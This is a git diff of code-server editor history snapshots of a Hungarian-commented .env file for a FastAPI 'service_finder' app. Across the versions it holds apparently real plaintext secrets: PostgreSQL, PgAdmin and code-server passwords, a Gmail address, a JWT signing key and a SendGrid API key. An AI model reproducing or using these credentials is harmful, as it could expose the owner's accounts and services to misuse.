b/code-server-config/data/User/History/-5bd368a0/27fC new file mode 100755 index 0000000..e1651af --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/27fC @@ -0,0 +1,39 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/479L b/code-server-config/data/User/History/-5bd368a0/479L new file mode 100755 index 0000000..2078116 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/479L @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/4MYC b/code-server-config/data/User/History/-5bd368a0/4MYC new file mode 100755 index 0000000..22d9942 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/4MYC @@ -0,0 +1,45 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} +DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/66Rx b/code-server-config/data/User/History/-5bd368a0/66Rx new file mode 100755 index 0000000..1020be9 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/66Rx @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} +DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/6P40 b/code-server-config/data/User/History/-5bd368a0/6P40 new file mode 100755 index 0000000..34b8a35 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/6P40 @@ -0,0 +1,44 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/8R6W b/code-server-config/data/User/History/-5bd368a0/8R6W new file mode 100755 index 0000000..a49d557 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/8R6W @@ -0,0 +1,60 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 + +SECRET_KEY=SzuperTitkosVéletlenszerűKaraktersorozat_Amit_Csak_Te_Tudsz_2026 + +SECRET_KEY="2e34bfff3e448c6d6f75cbacf65035e3a833e6648053e8e97ce37c6fa82b6525" + +SENDGRID_API_KEY=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 +FROM_EMAIL=info@profibot.hu \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/9UOq b/code-server-config/data/User/History/-5bd368a0/9UOq new file mode 100755 index 0000000..0ebae53 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/9UOq @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${POSTGRES_DB} +DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/BlV7 b/code-server-config/data/User/History/-5bd368a0/BlV7 new file mode 100755 index 0000000..6257f86 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/BlV7 @@ -0,0 +1,32 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +# DATABASE_URL=postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + + +# --- REDIS (A session kezeléshez) --- +REDIS_URL=redis://redis:6379/0 + +# PgAdmin +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/DBmG b/code-server-config/data/User/History/-5bd368a0/DBmG new file mode 100755 index 0000000..1fe1cd1 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/DBmG @@ -0,0 +1,44 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/DqPk b/code-server-config/data/User/History/-5bd368a0/DqPk new file mode 100755 index 0000000..76d504f --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/DqPk @@ -0,0 +1,60 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=AppSafePass_2026 +# DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 +REFRESH_TOKEN_EXPIRE_DAYS=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 + +SECRET_KEY=SzuperTitkosVéletlenszerűKaraktersorozat_Amit_Csak_Te_Tudsz_2026 + +SECRET_KEY="2e34bfff3e448c6d6f75cbacf65035e3a833e6648053e8e97ce37c6fa82b6525" +ALGORITHM="HS256" +SENDGRID_API_KEY=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 +FROM_EMAIL=info@profibot.hu \ No newline at end of file diff --git a/code-server-config/data/User/History/-5bd368a0/Dsy9 b/code-server-config/data/User/History/-5bd368a0/Dsy9 new file mode 100755 index 0000000..402fa4a --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/Dsy9 @@ -0,0 +1,26 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_port=5432 + +# --- ADATBÁZIS ELÉRÉS (A Python kódnak) --- +# Formátum: postgresql+asyncpg://FELHASZNÁLÓ:JELSZÓ@KONTÉNER_NÉV:PORT/ADATBÁZIS_NÉV +DATABASE_URL=postgresql+asyncpg://kincses:MiskociA74@postgres-db:5432/service_finder + +# --- REDIS (A session kezeléshez) --- +REDIS_URL=redis://redis:6379/0 + +# PgAdmin +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# Backend (FastAPI) +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/GwU6 b/code-server-config/data/User/History/-5bd368a0/GwU6 new file mode 100755 index 0000000..9665e2e --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/GwU6 @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +# +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/H5Zm b/code-server-config/data/User/History/-5bd368a0/H5Zm new file mode 100755 index 0000000..2078116 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/H5Zm @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} +# DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/HmdC b/code-server-config/data/User/History/-5bd368a0/HmdC new file mode 100755 index 0000000..fc39d13 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/HmdC @@ -0,0 +1,52 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=MiskociA74 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +# --- APP KAPCSOLAT (A Pythonnak) --- +# Itt szedjük szét a hosszú sort: +APP_DB_HOST=postgres-db +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +APP_DB_PASSWORD=Uj_BIZTONSÁGOS_JELSZÓ +# DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} +DATABASE_URL="postgresql+asyncpg://service_finder_app:AppJelszo@postgres-db:5432/service_finder" + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=GeneraltRandomHosszuStringAmiTitkos +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# MinIO (NAS) elérés - A POSTGRES adatait használjuk az egyszerűségért +MINIO_ROOT_USER=${POSTGRES_USER} +MINIO_ROOT_PASSWORD=${POSTGRES_PASSWORD} +MINIO_ENDPOINT=minio:9000 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + + + +# Code Server (ha használod a webes VS Code-ot) +CODE_SERVER_PASSWORD=Megeszemakalapom11 diff --git a/code-server-config/data/User/History/-5bd368a0/IXdY b/code-server-config/data/User/History/-5bd368a0/IXdY new file mode 100755 index 0000000..98b42b4 --- /dev/null +++ b/code-server-config/data/User/History/-5bd368a0/IXdY @@ -0,0 +1,46 @@ +# ========================================== +# 1. ADATBÁZIS KONFIGURÁCIÓ (PostgreSQL) +# ========================================== +POSTGRES_USER=kincses +POSTGRES_PASSWORD=PASSWORD111 +POSTGRES_DB=service_finder +POSTGRES_HOST=postgres-db +POSTGRES_PORT=5432 + +# Ez a sor építi fel a teljes kapcsolati stringet a fenti változókból. +# Így ha feljebb átírod a jelszót, a program is tudni fogja. +DATABASE_URL=postgresql+asyncpg://${POSTGRES_USER}:${POSTGRES_PASSWORD}@${POSTGRES_HOST}:${POSTGRES_PORT}/${POSTGRES_DB} + +# ========================================== +# 2. BIZTONSÁG & AUTH (FastAPI) +# ========================================== +# A JWT tokenek aláírásához. Ezt SOHA ne add ki senkinek! +# Generálj egy újat linuxon ezzel: openssl rand -hex 32 +SECRET_KEY=szuper_titkos_random_string_amit_senki_nem_tud +ALGORITHM=HS256 +ACCESS_TOKEN_EXPIRE_MINUTES=30 + +# ========================================== +# 3. INFRASTRUKTÚRA & CACHE +# ========================================== +# A Redis belső hálózati elérése (a container neve 'redis') +REDIS_URL=redis://redis:6379/0 + +# ========================================== +# 4. MONITORING & TOOLS +# ========================================== +# PgAdmin belépés +PGADMIN_EMAIL=kincses@gmail.com +PGADMIN_PASSWORD=MiskociA74 + +# ========================================== +# 2. 